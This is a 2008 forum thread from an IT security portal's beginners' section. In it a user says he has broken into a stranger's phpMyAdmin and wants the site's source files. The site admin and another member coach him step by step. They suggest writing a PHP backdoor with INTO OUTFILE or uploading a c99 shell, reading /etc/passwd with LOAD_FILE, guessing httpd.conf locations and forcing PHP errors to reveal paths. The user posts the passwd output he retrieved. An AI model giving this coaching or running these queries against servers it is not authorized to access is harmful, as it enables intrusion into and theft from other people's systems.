Waraxe IT Security Portal
Login or Register
November 24, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 44
Members: 0
Total: 44
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> How i can Download is files ? Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
How i can Download is files ?
PostPosted: Thu Apr 10, 2008 9:41 am Reply with quote
clubreseau
Advanced user
Advanced user
Joined: Apr 10, 2008
Posts: 128




I Found a site to hack and...

I found the password to enter in is phpmyadmin, i got all is database information, and structure.

Now i want to know if it exist a way to grab all is php and html files ?

the version of phpmyadmin is phpMyAdmin 2.5.4
and the version of mysql is MySQL 4.1.11-Debian_4sarge8-log

thank for your help !
View user's profile Send private message
PostPosted: Thu Apr 10, 2008 10:02 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




if you have FILE privelages then you can access files.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Thu Apr 10, 2008 10:04 am Reply with quote
clubreseau
Advanced user
Advanced user
Joined: Apr 10, 2008
Posts: 128




how with phpmyadmin i can browse files ?
View user's profile Send private message
PostPosted: Thu Apr 10, 2008 10:06 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




If you have access to "mysql.user" table, then you have FILE privileges or you can delegate them to any other mysql user. And as gibbocool allready said, FILE privileges in mysql means ability to read and write files in database server. You can't "browse" files directly with phpmyadmin though Smile
Use "INTO OUTFILE" for writing php backdoor and then use php functions for browsing the filesystem. Or upload php shell (c99?) and make use of it.


Last edited by waraxe on Thu Apr 10, 2008 10:09 am; edited 1 time in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Apr 10, 2008 10:08 am Reply with quote
clubreseau
Advanced user
Advanced user
Joined: Apr 10, 2008
Posts: 128




ok i use any program to enter i use www.site.com/phpmyadmin

can you tell me if i need a progrma to browse files
View user's profile Send private message
PostPosted: Thu Apr 10, 2008 10:19 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




clubreseau wrote:
ok i use any program to enter i use www.site.com/phpmyadmin

can you tell me if i need a progrma to browse files


Do you have php basic knowledge? Do you know "INTO OUTFILE" sql query? You need some knowledge before you can go further Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Apr 10, 2008 10:24 am Reply with quote
clubreseau
Advanced user
Advanced user
Joined: Apr 10, 2008
Posts: 128




my problem is the language im french Smile

ok i browse file in phpmyadmin no problem.

now what i have to do ?

thank
View user's profile Send private message
PostPosted: Thu Apr 10, 2008 10:39 am Reply with quote
clubreseau
Advanced user
Advanced user
Joined: Apr 10, 2008
Posts: 128




i try

LOAD DATA INFILE
and
SELECT * INTO OUTFILE

can you explain please how it work this
View user's profile Send private message
PostPosted: Thu Apr 10, 2008 10:40 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Try this in phpmyadmin:

go to "Run SQL query/queries on database", where you can enter arbitrary sql queries.

And execute this query:

SELECT LOAD_FILE('/etc/passwd')

Let me know about results Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Apr 10, 2008 10:44 am Reply with quote
clubreseau
Advanced user
Advanced user
Joined: Apr 10, 2008
Posts: 128




wow i see Smile

root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemo...
View user's profile Send private message
PostPosted: Thu Apr 10, 2008 10:49 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Now ... probably you can read the files you wanted (php and html files). But you need to know FULL PATH to any file you want to access. So you need to exploit some full path dislcosure or you can try to guess full path via trial/error. Look at "/etc/passwd" file - do you see there username, which can be associated with your target? If so, then you should see there home directory too.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Apr 10, 2008 10:55 am Reply with quote
clubreseau
Advanced user
Advanced user
Joined: Apr 10, 2008
Posts: 128




SELECT LOAD_FILE('/etc/passwd')

i got this

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh

[ edited by waraxe - no sensitive private info ! ]
View user's profile Send private message
PostPosted: Thu Apr 10, 2008 11:01 am Reply with quote
clubreseau
Advanced user
Advanced user
Joined: Apr 10, 2008
Posts: 128




i dont know where is the directory to get is index page of this site.

i try

SELECT LOAD_FILE('index.php');
SELECT LOAD_FILE('../index.php');
SELECT LOAD_FILE('/var/www/index.php');


no one work
View user's profile Send private message
PostPosted: Thu Apr 10, 2008 11:22 am Reply with quote
clubreseau
Advanced user
Advanced user
Joined: Apr 10, 2008
Posts: 128




someone can give me some tips ? how to find the path dir of is files ?
View user's profile Send private message
PostPosted: Thu Apr 10, 2008 1:56 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You need to do some research about target.
Try this: SELECT LOAD_FILE('/proc/version')

Next question - is the target webserver Apache? Apache 2? 2.2?
From etc/passwd file target server seems to be dedicated webserver, not shared virtual hosting provider. So i suggest to search for "httpd.conf" file. From this Apache config file you can find out all about webroot(s) dirs.
Usually Apache config file is located in:

$APACHE_HOME/conf/httpd.conf

So if you can get this environment variable, then you probably will find httpd.conf file too.
Some possible locations:

/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
usr/local/apache2.2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/etc/apache/httpd.conf

More ideas:

http://wiki.apache.org/httpd/DistrosDefaultLayout

There is one more solution - full path disclosure security issues.
Try to provoke (php) error messages in target.
If you can see something like:

Code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/someuser/public_html/somedir/somefile.html on line 221


... then you have all the full path info you wanted Wink
View user's profile Send private message Send e-mail Visit poster's website
How i can Download is files ?
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.048 Seconds